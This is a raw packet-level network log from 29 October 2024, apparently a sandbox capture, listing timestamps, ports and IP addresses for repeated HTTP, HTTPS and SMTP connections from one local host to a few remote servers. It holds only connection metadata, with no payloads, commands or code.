Oct 29, 2024 10:32:16.081562996 CET	80	49713	132.226.247.73	192.168.2.8
Oct 29, 2024 10:32:16.081615925 CET	49713	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:16.083173037 CET	80	49721	132.226.247.73	192.168.2.8
Oct 29, 2024 10:32:16.083247900 CET	49721	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:16.083441019 CET	49721	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:16.088742018 CET	80	49721	132.226.247.73	192.168.2.8
Oct 29, 2024 10:32:16.485830069 CET	443	49720	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:16.487528086 CET	49720	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:16.487546921 CET	443	49720	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:16.630294085 CET	443	49720	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:16.630350113 CET	443	49720	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:16.630563021 CET	49720	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:16.631112099 CET	49720	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:16.636260986 CET	49718	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:16.637562037 CET	49722	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:16.642493963 CET	80	49718	132.226.247.73	192.168.2.8
Oct 29, 2024 10:32:16.642554045 CET	49718	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:16.642946005 CET	80	49722	132.226.247.73	192.168.2.8
Oct 29, 2024 10:32:16.643197060 CET	49722	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:16.643260002 CET	49722	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:16.648612976 CET	80	49722	132.226.247.73	192.168.2.8
Oct 29, 2024 10:32:16.957869053 CET	80	49721	132.226.247.73	192.168.2.8
Oct 29, 2024 10:32:16.959326982 CET	49723	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:16.959414959 CET	443	49723	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:16.959575891 CET	49723	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:16.959997892 CET	49723	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:16.960019112 CET	443	49723	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:17.004379988 CET	49721	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:17.513854980 CET	80	49722	132.226.247.73	192.168.2.8
Oct 29, 2024 10:32:17.577068090 CET	443	49723	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:17.582530975 CET	49722	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:17.599776030 CET	49724	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:17.599803925 CET	443	49724	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:17.599860907 CET	49724	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:17.603185892 CET	49724	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:17.603199959 CET	443	49724	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:17.629435062 CET	49723	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:17.720232010 CET	49723	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:17.720261097 CET	443	49723	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:17.857095957 CET	443	49723	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:17.857254982 CET	443	49723	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:17.857304096 CET	49723	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:17.857705116 CET	49723	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:17.861867905 CET	49725	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:17.867528915 CET	80	49725	132.226.247.73	192.168.2.8
Oct 29, 2024 10:32:17.867639065 CET	49725	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:17.892374039 CET	49725	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:17.897903919 CET	80	49725	132.226.247.73	192.168.2.8
Oct 29, 2024 10:32:18.237462997 CET	443	49724	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:18.239752054 CET	49724	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:18.239765882 CET	443	49724	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:18.383805037 CET	443	49724	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:18.383944035 CET	443	49724	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:18.383996010 CET	49724	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:18.384567976 CET	49724	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:18.389221907 CET	49722	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:18.390759945 CET	49726	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:18.395005941 CET	80	49722	132.226.247.73	192.168.2.8
Oct 29, 2024 10:32:18.395083904 CET	49722	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:18.396110058 CET	80	49726	132.226.247.73	192.168.2.8
Oct 29, 2024 10:32:18.396166086 CET	49726	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:18.396279097 CET	49726	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:18.401927948 CET	80	49726	132.226.247.73	192.168.2.8
Oct 29, 2024 10:32:18.725027084 CET	80	49725	132.226.247.73	192.168.2.8
Oct 29, 2024 10:32:18.726542950 CET	49727	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:18.726578951 CET	443	49727	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:18.726639032 CET	49727	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:18.727021933 CET	49727	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:18.727042913 CET	443	49727	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:18.770055056 CET	49725	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:19.287914038 CET	80	49726	132.226.247.73	192.168.2.8
Oct 29, 2024 10:32:19.289249897 CET	49728	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:19.289284945 CET	443	49728	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:19.289391994 CET	49728	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:19.289629936 CET	49728	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:19.289653063 CET	443	49728	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:19.332573891 CET	49726	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:19.338390112 CET	443	49727	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:19.341475010 CET	49727	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:19.341520071 CET	443	49727	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:19.483325958 CET	443	49727	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:19.483375072 CET	443	49727	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:19.483491898 CET	49727	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:19.483918905 CET	49727	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:19.487867117 CET	49725	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:19.489033937 CET	49729	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:19.493624926 CET	80	49725	132.226.247.73	192.168.2.8
Oct 29, 2024 10:32:19.494422913 CET	80	49729	132.226.247.73	192.168.2.8
Oct 29, 2024 10:32:19.494507074 CET	49725	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:19.494560003 CET	49729	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:19.494723082 CET	49729	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:19.500010967 CET	80	49729	132.226.247.73	192.168.2.8
Oct 29, 2024 10:32:19.898525953 CET	443	49728	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:19.900077105 CET	49728	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:19.900115013 CET	443	49728	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:20.041358948 CET	443	49728	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:20.041431904 CET	443	49728	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:20.041557074 CET	49728	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:20.052197933 CET	49728	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:20.056318998 CET	49726	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:20.056956053 CET	49730	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:20.063601971 CET	80	49730	132.226.247.73	192.168.2.8
Oct 29, 2024 10:32:20.063854933 CET	49730	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:20.063855886 CET	49730	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:20.064507961 CET	80	49726	132.226.247.73	192.168.2.8
Oct 29, 2024 10:32:20.064558983 CET	49726	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:20.070023060 CET	80	49730	132.226.247.73	192.168.2.8
Oct 29, 2024 10:32:20.371212006 CET	80	49729	132.226.247.73	192.168.2.8
Oct 29, 2024 10:32:20.402395010 CET	49731	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:20.402426958 CET	443	49731	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:20.402493954 CET	49731	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:20.402884960 CET	49731	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:20.402900934 CET	443	49731	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:20.410655975 CET	49729	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:20.951654911 CET	80	49730	132.226.247.73	192.168.2.8
Oct 29, 2024 10:32:20.952931881 CET	49732	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:20.953027010 CET	443	49732	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:20.953109026 CET	49732	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:20.953367949 CET	49732	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:20.953406096 CET	443	49732	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:21.004416943 CET	49730	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:21.021847963 CET	443	49731	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:21.026653051 CET	49731	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:21.026669979 CET	443	49731	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:21.165370941 CET	443	49731	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:21.165420055 CET	443	49731	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:21.165466070 CET	49731	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:21.165889978 CET	49731	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:21.170907974 CET	49729	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:21.172163963 CET	49734	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:21.176743031 CET	80	49729	132.226.247.73	192.168.2.8
Oct 29, 2024 10:32:21.176801920 CET	49729	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:21.177524090 CET	80	49734	132.226.247.73	192.168.2.8
Oct 29, 2024 10:32:21.177592039 CET	49734	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:21.177700996 CET	49734	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:21.183145046 CET	80	49734	132.226.247.73	192.168.2.8
Oct 29, 2024 10:32:21.560452938 CET	443	49732	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:21.561961889 CET	49732	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:21.561990023 CET	443	49732	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:21.706568956 CET	443	49732	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:21.706775904 CET	443	49732	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:21.706834078 CET	49732	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:21.707284927 CET	49732	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:21.711743116 CET	49730	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:21.713113070 CET	49736	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:21.717961073 CET	80	49730	132.226.247.73	192.168.2.8
Oct 29, 2024 10:32:21.718013048 CET	49730	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:21.718854904 CET	80	49736	132.226.247.73	192.168.2.8
Oct 29, 2024 10:32:21.718915939 CET	49736	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:21.719115019 CET	49736	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:21.724839926 CET	80	49736	132.226.247.73	192.168.2.8
Oct 29, 2024 10:32:22.051558971 CET	80	49734	132.226.247.73	192.168.2.8
Oct 29, 2024 10:32:22.053268909 CET	49737	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:22.053361893 CET	443	49737	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:22.053443909 CET	49737	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:22.053714037 CET	49737	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:22.053749084 CET	443	49737	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:22.098155975 CET	49734	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:22.577249050 CET	80	49736	132.226.247.73	192.168.2.8
Oct 29, 2024 10:32:22.578481913 CET	49739	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:22.578557968 CET	443	49739	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:22.578649998 CET	49739	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:22.578891039 CET	49739	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:22.578938961 CET	443	49739	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:22.624445915 CET	49736	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:23.765089035 CET	443	49739	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:23.766047955 CET	443	49737	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:23.767257929 CET	49739	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:23.767330885 CET	443	49739	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:23.769814968 CET	49737	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:23.769846916 CET	443	49737	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:23.933638096 CET	443	49739	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:23.933693886 CET	443	49739	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:23.933746099 CET	49739	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:23.934108019 CET	443	49737	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:23.934178114 CET	443	49737	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:23.934212923 CET	49739	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:23.934264898 CET	49737	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:23.934746027 CET	49737	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:23.938143969 CET	49734	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:23.939551115 CET	49740	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:23.944396973 CET	80	49734	132.226.247.73	192.168.2.8
Oct 29, 2024 10:32:23.944571018 CET	49734	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:23.944991112 CET	80	49740	132.226.247.73	192.168.2.8
Oct 29, 2024 10:32:23.945081949 CET	49740	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:23.945293903 CET	49740	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:23.950586081 CET	80	49740	132.226.247.73	192.168.2.8
Oct 29, 2024 10:32:23.950897932 CET	49736	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:23.956861019 CET	80	49736	132.226.247.73	192.168.2.8
Oct 29, 2024 10:32:23.956962109 CET	49736	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:23.959496021 CET	49741	443	192.168.2.8	149.154.167.220
Oct 29, 2024 10:32:23.959530115 CET	443	49741	149.154.167.220	192.168.2.8
Oct 29, 2024 10:32:23.959588051 CET	49741	443	192.168.2.8	149.154.167.220
Oct 29, 2024 10:32:23.960055113 CET	49741	443	192.168.2.8	149.154.167.220
Oct 29, 2024 10:32:23.960078001 CET	443	49741	149.154.167.220	192.168.2.8
Oct 29, 2024 10:32:24.820432901 CET	80	49740	132.226.247.73	192.168.2.8
Oct 29, 2024 10:32:24.821942091 CET	49743	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:24.821986914 CET	443	49743	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:24.822073936 CET	49743	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:24.822478056 CET	49743	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:24.822495937 CET	443	49743	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:24.839441061 CET	443	49741	149.154.167.220	192.168.2.8
Oct 29, 2024 10:32:24.839567900 CET	49741	443	192.168.2.8	149.154.167.220
Oct 29, 2024 10:32:24.841511965 CET	49741	443	192.168.2.8	149.154.167.220
Oct 29, 2024 10:32:24.841528893 CET	443	49741	149.154.167.220	192.168.2.8
Oct 29, 2024 10:32:24.841795921 CET	443	49741	149.154.167.220	192.168.2.8
Oct 29, 2024 10:32:24.843693018 CET	49741	443	192.168.2.8	149.154.167.220
Oct 29, 2024 10:32:24.863804102 CET	49740	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:24.891325951 CET	443	49741	149.154.167.220	192.168.2.8
Oct 29, 2024 10:32:25.086509943 CET	443	49741	149.154.167.220	192.168.2.8
Oct 29, 2024 10:32:25.086679935 CET	443	49741	149.154.167.220	192.168.2.8
Oct 29, 2024 10:32:25.086739063 CET	49741	443	192.168.2.8	149.154.167.220
Oct 29, 2024 10:32:25.095491886 CET	49741	443	192.168.2.8	149.154.167.220
Oct 29, 2024 10:32:25.456321001 CET	443	49743	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:25.464714050 CET	49743	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:25.464742899 CET	443	49743	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:25.607763052 CET	443	49743	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:25.607891083 CET	443	49743	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:25.607949018 CET	49743	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:25.609163046 CET	49743	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:25.646821022 CET	49740	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:25.652740955 CET	80	49740	132.226.247.73	192.168.2.8
Oct 29, 2024 10:32:25.652801037 CET	49740	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:25.659543037 CET	49744	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:25.665733099 CET	80	49744	132.226.247.73	192.168.2.8
Oct 29, 2024 10:32:25.666409969 CET	49744	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:25.666497946 CET	49744	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:25.671875954 CET	80	49744	132.226.247.73	192.168.2.8
Oct 29, 2024 10:32:26.538157940 CET	80	49744	132.226.247.73	192.168.2.8
Oct 29, 2024 10:32:26.582566023 CET	49744	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:26.667308092 CET	49745	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:26.667362928 CET	443	49745	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:26.667417049 CET	49745	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:26.668970108 CET	49745	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:26.668986082 CET	443	49745	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:27.266803980 CET	443	49745	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:27.268956900 CET	49745	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:27.269004107 CET	443	49745	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:27.414937019 CET	443	49745	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:27.415123940 CET	443	49745	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:27.415199041 CET	49745	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:27.415546894 CET	49745	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:27.418415070 CET	49744	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:27.419625044 CET	49746	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:27.424422026 CET	80	49744	132.226.247.73	192.168.2.8
Oct 29, 2024 10:32:27.424499035 CET	49744	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:27.424971104 CET	80	49746	132.226.247.73	192.168.2.8
Oct 29, 2024 10:32:27.425028086 CET	49746	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:27.425142050 CET	49746	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:27.430380106 CET	80	49746	132.226.247.73	192.168.2.8
Oct 29, 2024 10:32:28.300967932 CET	80	49746	132.226.247.73	192.168.2.8
Oct 29, 2024 10:32:28.302548885 CET	51299	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:28.302613974 CET	443	51299	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:28.302696943 CET	51299	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:28.302963018 CET	51299	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:28.302978992 CET	443	51299	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:28.348179102 CET	49746	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:28.942923069 CET	443	51299	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:28.944700003 CET	51299	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:28.944741011 CET	443	51299	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:29.096187115 CET	443	51299	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:29.096272945 CET	443	51299	188.114.97.3	192.168.2.8
Oct 29, 2024 10:32:29.096327066 CET	51299	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:29.117108107 CET	51299	443	192.168.2.8	188.114.97.3
Oct 29, 2024 10:32:29.311639071 CET	49746	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:29.312490940 CET	51300	443	192.168.2.8	149.154.167.220
Oct 29, 2024 10:32:29.312560081 CET	443	51300	149.154.167.220	192.168.2.8
Oct 29, 2024 10:32:29.312625885 CET	51300	443	192.168.2.8	149.154.167.220
Oct 29, 2024 10:32:29.312994957 CET	51300	443	192.168.2.8	149.154.167.220
Oct 29, 2024 10:32:29.313010931 CET	443	51300	149.154.167.220	192.168.2.8
Oct 29, 2024 10:32:29.318140030 CET	80	49746	132.226.247.73	192.168.2.8
Oct 29, 2024 10:32:29.318211079 CET	49746	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:30.198771954 CET	443	51300	149.154.167.220	192.168.2.8
Oct 29, 2024 10:32:30.198847055 CET	51300	443	192.168.2.8	149.154.167.220
Oct 29, 2024 10:32:30.200783968 CET	51300	443	192.168.2.8	149.154.167.220
Oct 29, 2024 10:32:30.200805902 CET	443	51300	149.154.167.220	192.168.2.8
Oct 29, 2024 10:32:30.201057911 CET	443	51300	149.154.167.220	192.168.2.8
Oct 29, 2024 10:32:30.207772017 CET	51300	443	192.168.2.8	149.154.167.220
Oct 29, 2024 10:32:30.251337051 CET	443	51300	149.154.167.220	192.168.2.8
Oct 29, 2024 10:32:30.452322960 CET	443	51300	149.154.167.220	192.168.2.8
Oct 29, 2024 10:32:30.452421904 CET	443	51300	149.154.167.220	192.168.2.8
Oct 29, 2024 10:32:30.452507019 CET	51300	443	192.168.2.8	149.154.167.220
Oct 29, 2024 10:32:30.454742908 CET	51300	443	192.168.2.8	149.154.167.220
Oct 29, 2024 10:32:30.475039959 CET	49716	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:30.681461096 CET	51301	587	192.168.2.8	166.62.28.124
Oct 29, 2024 10:32:30.686984062 CET	587	51301	166.62.28.124	192.168.2.8
Oct 29, 2024 10:32:30.687092066 CET	51301	587	192.168.2.8	166.62.28.124
Oct 29, 2024 10:32:31.787811995 CET	587	51301	166.62.28.124	192.168.2.8
Oct 29, 2024 10:32:31.788042068 CET	51301	587	192.168.2.8	166.62.28.124
Oct 29, 2024 10:32:31.793479919 CET	587	51301	166.62.28.124	192.168.2.8
Oct 29, 2024 10:32:32.123368025 CET	587	51301	166.62.28.124	192.168.2.8
Oct 29, 2024 10:32:32.138971090 CET	51301	587	192.168.2.8	166.62.28.124
Oct 29, 2024 10:32:32.144407988 CET	587	51301	166.62.28.124	192.168.2.8
Oct 29, 2024 10:32:32.475183964 CET	587	51301	166.62.28.124	192.168.2.8
Oct 29, 2024 10:32:32.492103100 CET	51301	587	192.168.2.8	166.62.28.124
Oct 29, 2024 10:32:32.497503042 CET	587	51301	166.62.28.124	192.168.2.8
Oct 29, 2024 10:32:32.836466074 CET	587	51301	166.62.28.124	192.168.2.8
Oct 29, 2024 10:32:32.836483002 CET	587	51301	166.62.28.124	192.168.2.8
Oct 29, 2024 10:32:32.836498022 CET	587	51301	166.62.28.124	192.168.2.8
Oct 29, 2024 10:32:32.836505890 CET	587	51301	166.62.28.124	192.168.2.8
Oct 29, 2024 10:32:32.836527109 CET	587	51301	166.62.28.124	192.168.2.8
Oct 29, 2024 10:32:32.836596966 CET	51301	587	192.168.2.8	166.62.28.124
Oct 29, 2024 10:32:32.836627960 CET	51301	587	192.168.2.8	166.62.28.124
Oct 29, 2024 10:32:32.837788105 CET	587	51301	166.62.28.124	192.168.2.8
Oct 29, 2024 10:32:32.837800980 CET	587	51301	166.62.28.124	192.168.2.8
Oct 29, 2024 10:32:32.837855101 CET	51301	587	192.168.2.8	166.62.28.124
Oct 29, 2024 10:32:32.856955051 CET	51301	587	192.168.2.8	166.62.28.124
Oct 29, 2024 10:32:32.862622976 CET	587	51301	166.62.28.124	192.168.2.8
Oct 29, 2024 10:32:33.191605091 CET	587	51301	166.62.28.124	192.168.2.8
Oct 29, 2024 10:32:33.196439981 CET	51301	587	192.168.2.8	166.62.28.124
Oct 29, 2024 10:32:33.201841116 CET	587	51301	166.62.28.124	192.168.2.8
Oct 29, 2024 10:32:33.530956030 CET	587	51301	166.62.28.124	192.168.2.8
Oct 29, 2024 10:32:33.532207012 CET	51301	587	192.168.2.8	166.62.28.124
Oct 29, 2024 10:32:33.537600994 CET	587	51301	166.62.28.124	192.168.2.8
Oct 29, 2024 10:32:33.867158890 CET	587	51301	166.62.28.124	192.168.2.8
Oct 29, 2024 10:32:33.867471933 CET	51301	587	192.168.2.8	166.62.28.124
Oct 29, 2024 10:32:33.872850895 CET	587	51301	166.62.28.124	192.168.2.8
Oct 29, 2024 10:32:35.208195925 CET	587	51301	166.62.28.124	192.168.2.8
Oct 29, 2024 10:32:35.248503923 CET	51301	587	192.168.2.8	166.62.28.124
Oct 29, 2024 10:32:35.254179001 CET	587	51301	166.62.28.124	192.168.2.8
Oct 29, 2024 10:32:35.583237886 CET	587	51301	166.62.28.124	192.168.2.8
Oct 29, 2024 10:32:35.583496094 CET	51301	587	192.168.2.8	166.62.28.124
Oct 29, 2024 10:32:35.588931084 CET	587	51301	166.62.28.124	192.168.2.8
Oct 29, 2024 10:32:35.655592918 CET	49721	80	192.168.2.8	132.226.247.73
Oct 29, 2024 10:32:35.786863089 CET	51302	587	192.168.2.8	166.62.28.124
Oct 29, 2024 10:32:35.792390108 CET	587	51302	166.62.28.124	192.168.2.8
Oct 29, 2024 10:32:35.792483091 CET	51302	587	192.168.2.8	166.62.28.124
Oct 29, 2024 10:32:35.965529919 CET	587	51301	166.62.28.124	192.168.2.8
Oct 29, 2024 10:32:35.965740919 CET	51301	587	192.168.2.8	166.62.28.124
Oct 29, 2024 10:32:35.971167088 CET	587	51301	166.62.28.124	192.168.2.8
Oct 29, 2024 10:32:36.310375929 CET	587	51301	166.62.28.124	192.168.2.8
Oct 29, 2024 10:32:36.310991049 CET	51301	587	192.168.2.8	166.62.28.124
Oct 29, 2024 10:32:36.311044931 CET	51301	587	192.168.2.8	166.62.28.124
Oct 29, 2024 10:32:36.311063051 CET	51301	587	192.168.2.8	166.62.28.124
Oct 29, 2024 10:32:36.311081886 CET	51301	587	192.168.2.8	166.62.28.124
Oct 29, 2024 10:32:36.316397905 CET	587	51301	166.62.28.124	192.168.2.8
Oct 29, 2024 10:32:36.316412926 CET	587	51301	166.62.28.124	192.168.2.8
Oct 29, 2024 10:32:36.316481113 CET	587	51301	166.62.28.124	192.168.2.8
Oct 29, 2024 10:32:36.316498995 CET	587	51301	166.62.28.124	192.168.2.8
Oct 29, 2024 10:32:36.692661047 CET	587	51302	166.62.28.124	192.168.2.8
